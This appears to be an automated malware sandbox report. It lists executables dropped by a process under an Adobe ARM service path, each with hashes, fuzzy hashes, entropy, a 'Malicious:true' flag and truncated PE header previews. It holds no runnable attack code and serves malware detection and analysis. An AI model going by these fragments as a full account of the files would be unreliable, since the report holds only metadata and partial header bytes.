                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529320242418043
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:5Z5wiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:H0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:4893FD22ECE0D5B5B08E7D5F02A9629B
                                                                                                                                                  SHA1:14F05FEE35226CCA4CCFDDAA29608CEC5C8E35FA
                                                                                                                                                  SHA-256:8925A1AC30F7FEF29592BFABDE891B4827ABB9F8EB52BB214D900758E413CA84
                                                                                                                                                  SHA-512:926DD37D9D525A1F0CED80B2B4BA23795B669DA381650799B6AAE11637FB2D0541E5B1E0E5CDADAE2CD399BE38F28AEC00E9623F5F5517DB0642DC98C081019A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529374971331607
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:9ZlYiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:34/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:FDDA6D84C588A3DA8E4F6978226808D8
                                                                                                                                                  SHA1:A075FC0DE4C370D542878B72596EB775E4BE8E20
                                                                                                                                                  SHA-256:1A8149D5466D0753E5E7D883B08F13C40E80DECD9C2A4514F18479FC780B999E
                                                                                                                                                  SHA-512:2FC6D5162902387BA2615B92849F43D98771636793EA4094B29D0507E849B702180233478699131551A968169CEAEC448535D6B4575CE4AD6EEFC799BAD58EE1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529374707106074
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:uNlYiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Q4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:1960889C56479F2538F5002124449F50
                                                                                                                                                  SHA1:E47F4020B49050B0194EC1C4904514A294A10C51
                                                                                                                                                  SHA-256:2F75C33539037BF0197AA0A2A9E5F10BE3B7DE75411BA382012E5D9F66316706
                                                                                                                                                  SHA-512:F5AF762C2D7BEA88C36C5B1EA9629E1D2FB403DBE2E5A7EFF40939A661B6D7F56BB728A98C225BAE20381C14767D02363C5219260FD289FA1BA7824582CC8780
                                                                                                                                                  Malicious:true
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529353490025967
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:Kmm4iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:lr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:B125035D6D01497EC9460E4066C67FB6
                                                                                                                                                  SHA1:064F8B5F47912B143BA00FC06D7338BB8148DD60
                                                                                                                                                  SHA-256:F0F7D73A89BC36AD380FDC9FE4C71730E8C0DD118813759D8A552090AF9D5706
                                                                                                                                                  SHA-512:D29455C745BF211B6976317C4FCB201FA973FB5756F397DC978BF358559F41F1EE32C073F5737DB949CCEC598D751A7BD8822EE42E3166C0F772B7D631CD2594
                                                                                                                                                  Malicious:true
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.530191949349729
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:wnmEiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:an/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:A53EF06C47227C108986117FD480A6A8
                                                                                                                                                  SHA1:44D646F92573145D5C86E56331BCF283F7F5D582
                                                                                                                                                  SHA-256:7F3DDBED99161B2A43097C106B0BB9B76045B70F8F7AEA0CB717A4FDC5AEFA40
                                                                                                                                                  SHA-512:A93377E77135337A115FFDEB877661518E9840156042D9B659E9FF3E29E22908F8B93A531862B119C3666B32AF5D9B44B038000B927EA3733968F3690C56EE24
                                                                                                                                                  Malicious:true
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529339204103891
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:+T5wiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:OM/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:FD890001637DA83895F5532DA8FAB1DD
                                                                                                                                                  SHA1:C884AA3AB294F8D6CFC33E6E0133957373D44C74
                                                                                                                                                  SHA-256:FA019F4B7C36C09DAC627B160865C78614BA52D5B4FE9A439480A6A72FDD17B8
                                                                                                                                                  SHA-512:D63E970CED2F8F6F421CD412E27D826E6865E9C71C0ADB034920B1219EDC1C7D5EB2F4A202A3E11CA03EC7C3FF14DBB5891231E0D19BA6D0B8B8AE8C66781D62
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529357861203298
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:ew/YiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:fS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:CF93893CBCB9FD2065645BE2745D100B
                                                                                                                                                  SHA1:C7342A1171210D94ABE41D9423DF65DFFD774A2B
                                                                                                                                                  SHA-256:63C2072193953BCC710B025C50D578FFD3BDCAF0EA6599B5200EA8D6EB47ECF5
                                                                                                                                                  SHA-512:7C5447EF724217513CB2AC623EAF98E1193675543623BFC4EF69DB2DB88595F62374EB070C74C810BF30540DB5B2941813194287421980DB362B7D59884FFC06
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529281003193878
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:0AmoiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:xr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:CB75D62DC8A10349A4D94EAF3442A8AF
                                                                                                                                                  SHA1:BD292C54907E11259CC16075CDDA9366233AB081
                                                                                                                                                  SHA-256:7486EECD0F2FF6FF60B504A04271A8568EB0ACE32CA130483C8CEFC5A0E92EEC
                                                                                                                                                  SHA-512:345F08326137AC16F782A533160566C8DA70331E9CEC4E2C1D165D21FB72EB7B0F59ACB5BE59A3688F510906AF09234660C13060DEF6E4397D40A93A44FD35E3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................-........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529320381532006
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:S1SQiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:ov/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:6583E40BECCCFE6F6F76281DEF62316F
                                                                                                                                                  SHA1:2D77BA43B4B7A936B39651291EA47068B09B8DFE
                                                                                                                                                  SHA-256:0485E85B6939D2A7B5C52DBDBB6799E79AA36A0365534B8D415CD215D3904530
                                                                                                                                                  SHA-512:1914F81C8515F26281CE1D210AD012C5357C738001931A48B8CEC49FE24CF208AFBC88047EAD21A33FB8B805AA2064FA62222078270AEB21DAE1A18455052DE7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................&........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529391610842829
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:5U/YiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:2S/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:B47A4E033B71AAB469201A2EDAA30811
                                                                                                                                                  SHA1:C4E63E4E41F1CB1B15A67B8D6AAD8BCE28114A5C
                                                                                                                                                  SHA-256:DA81F6CFBFE93C5BF9BA01CDA2404666E1A7BFBA36C34545AA4D3AD8AF59C262
                                                                                                                                                  SHA-512:23F31D54D3DF683380F40315B01349A213086F0473D27D7E1A4091ED7731C6498D0FE6A535A7EF2BB3C452B174329658C5B428ED129C0FD5EFB59738079F05A8
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................x........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1358336
                                                                                                                                                  Entropy (8bit):4.612101598034031
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:tEs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:tXLNiXicJFFRGNzj3
                                                                                                                                                  MD5:5E43BAD49E482B8F2EB2AF13AB31973B
                                                                                                                                                  SHA1:B0E1E0307DC3FD304EDF9B4F8D6061DB1F15B80F
                                                                                                                                                  SHA-256:0365EEB05A88D3931A058DDFE71EB5977AA6D438D7B3ED36C8F2D444D3A596DD
                                                                                                                                                  SHA-512:9CC9715D4E4B4D4BC01A36CFEAD459B7D1425CF48C9CD7249EECDB833A3E7C0877F769F6B79FA5C1DDEB92F7C41A63FF4AFBE9A3D9E50B72F77BA464B75619A2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................h...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1298432
                                                                                                                                                  Entropy (8bit):4.5289694914569
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:7FQ0iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:RJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:504B2F9BAD5E5DE065E818F904149B8D
                                                                                                                                                  SHA1:31785C1EEA0B29988DAA407D413AC61C3EF15A17
                                                                                                                                                  SHA-256:47A799BC4993CFEBCBFE607508ABBD96A3ED9BEFCC939AAFFFD438FD47A2A654
                                                                                                                                                  SHA-512:1CF78A1B34275A5E84149F48EC3BB23B43CA2F814DFA07FD62DBD334448C020AB79AD4A3B02F5F20CBEE195162F65251E211323D312488026C8E426251CDB982
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..................................l.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...`...P.......0..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1454592
                                                                                                                                                  Entropy (8bit):4.787851016884923
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Qi7le3roAI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zloroAILNiXicJFFRGNzj3
                                                                                                                                                  MD5:B10F80D1F6B68448B497D59C88F855D8
                                                                                                                                                  SHA1:BDA053D6C0A2D5D7F0022F24395E568E9AB91A5F
                                                                                                                                                  SHA-256:B5589EE873BEB4F28FEC3BCE5941DF22EB2B783657F5A81DF263D6F07E7D54AA
                                                                                                                                                  SHA-512:82F97FDA447AD5307BD69D872A4D2D46A896D577BF4C5F9E9D3014976D69F96A30EB1231B0B3B3607B901000A4EABF95ADEA406D3B36C855DB926B40F3442C8E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................@!.........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1424896
                                                                                                                                                  Entropy (8bit):4.811524742068078
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:7NfQNt/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:RGtLNiXicJFFRGNzj3
                                                                                                                                                  MD5:1D461E4AF3D39CD739765541BB8E444C
                                                                                                                                                  SHA1:A10C205329F775A451F5DDFBC621B4A894EB6DA4
                                                                                                                                                  SHA-256:FFFDE893A6040A15D67AD4B83512F029138319FE324207B02F8151725B57DB88
                                                                                                                                                  SHA-512:001A521DB189788A5EC6F4966D3CAA6106F30CB4F7FE01B43458109A2DED07B3D29FA53EDF6133FAE2FC3B2266C1F5AFB80122BCE330553356C4B8F33836EB8D
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................... ......J......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...p...@......................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1443328
                                                                                                                                                  Entropy (8bit):4.832399668119106
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:yLii/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0LNiXicJFFRGNzj3
                                                                                                                                                  MD5:5CD662111B715CFB14415324AFB6807B
                                                                                                                                                  SHA1:27C420610E788726D70BF1634A7D6780CCE0E5F7
                                                                                                                                                  SHA-256:308BB28074D2A203A867B2AEB9C2BB0ECCBAC94A7D5F386008EFEF6C3E167B6A
                                                                                                                                                  SHA-512:1BF683C1E9EC516C04EEB9B5537301B68FEBF16219B23F2CF8F42DC145B82D764124A16DE49434642ED9C99BC3EB0F41DC8A8DBD25F928FF2DA7AD8C44318237
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1443328
                                                                                                                                                  Entropy (8bit):4.83239334892395
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ZLii/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DLNiXicJFFRGNzj3
                                                                                                                                                  MD5:CA437280658F4A46ADC57498E5DF48DF
                                                                                                                                                  SHA1:B4AF2921E5E84652DB03B1CB21B8025C88EE56DB
                                                                                                                                                  SHA-256:155E683F58DA8DD1D213D136D65EED577A9D5212D35F9B6184A348168F9946C7
                                                                                                                                                  SHA-512:A3A704DA31FDE8BE2DB5FA019508B20FD2C1D015285749C2B3996651644B256D796EC0C9F7585CEDC1C2B775F6109610A06319A7BD37F8ED70ECF0EFD6545378
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .....8q........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1499136
                                                                                                                                                  Entropy (8bit):4.787944047801101
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:kf2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kf2LNiXicJFFRGNzj3
                                                                                                                                                  MD5:4EACC5E5D64FB5562D3E43D4F232FA1C
                                                                                                                                                  SHA1:595D443743B81CBE9773D9BAB6D9021B29AA91A1
                                                                                                                                                  SHA-256:3FEC2D728AE23644D793FF3A07ACC3D9D5F1BDA7F19C23B282AA45CB40E3E79A
                                                                                                                                                  SHA-512:8525F419DE0C0DBBA33143B4B14F5D35D48D85F179D38000AEBA2B1EE936F976BFF607EB977042AFD910BBCC29DE0224B7BE545AD69C31FB5DDF7D12B15D6B6B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@..............................!......K.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1651712
                                                                                                                                                  Entropy (8bit):5.153484784693589
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:+bUO42K/E0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:+R0LNiXicJFFRGNzj3
                                                                                                                                                  MD5:54D7863E22B496441097EC6189990F11
                                                                                                                                                  SHA1:61490A8D086B28F902913A32CC080C5BF51E06F2
                                                                                                                                                  SHA-256:542D8779F6F27EDBBED16DAF717525CD4A7E6C2976FC98D31D3CD4FA52B2AE28
                                                                                                                                                  SHA-512:9EFC72F808130E63B36EF7265662B1D3DDC9C45BD159D14AA2ED560417EF63A78A7602ED4696317A7DD62F44D52F3BA1B4B461C5DB53380D114E87125C5C01DD
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@..........................0$.................. ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):52712960
                                                                                                                                                  Entropy (8bit):7.961744860662916
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1572864:kKjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:HicZmsR3Lo/cnLe
                                                                                                                                                  MD5:DC130ED54EA46279771715999DE4E08A
                                                                                                                                                  SHA1:C03193E197A3D5BFF1EAD48ECF176C6218997372
                                                                                                                                                  SHA-256:AB65BC53D46EC91C33E9F338DB3D0E9AA09C75428ADC968EDDFE0FFD10B9F2B1
                                                                                                                                                  SHA-512:AFA5118C1227AF4E16D4655C5AEA2504CDEBAAA5CC1E9F415519760C25703CDE45E08570083704EE0EF7F328FE317A1B479376C9A1AF21960D12EA56EEE2E203
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....j.$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4993536
                                                                                                                                                  Entropy (8bit):6.808159034893057
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:olkkCqyDEY7+o3OBvfGVY+40yaHyS+9s/pLR7wRGpj3:ykkCqaE68eV+0yAE6L1F9
                                                                                                                                                  MD5:D5AEB696E27B257160DB0AA4DEC61D27
                                                                                                                                                  SHA1:87AA9F995FE60272B417F903EA431E6D51BBAD4C
                                                                                                                                                  SHA-256:92E7F15FE120278569CA8E5606C79899186C176CB9E9F2084B2F59026A052614
                                                                                                                                                  SHA-512:616A59E0C5DFBF48EC1566C75C7FB88CF2C62B2D38FAEC525DE5FED03057621F32377A1D742D5E131AED034367695AEAE39EB801A5A44B4234B7BF7BB60691AB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL.....w.L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1324032
                                                                                                                                                  Entropy (8bit):4.5502401544644675
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:XiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:j/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:C9975780F528FCE195E76A438415FB7A
                                                                                                                                                  SHA1:499AB65E1459F36A2A773DA48B9AA7961875F46A
                                                                                                                                                  SHA-256:033C3E007AA02197A779DEDDD6C529F4999F3996317F7B0BDB45724BDE2F0BA3
                                                                                                                                                  SHA-512:5034FEA0712F33227C6A2772A68C17087E371CCBFA5ADFF3D257D126F72307C9F1CDE6A6339ADFDA6534A748531C438BE14F4205FFAA6E80BC127B8586CC52A9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@.......................... .........................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
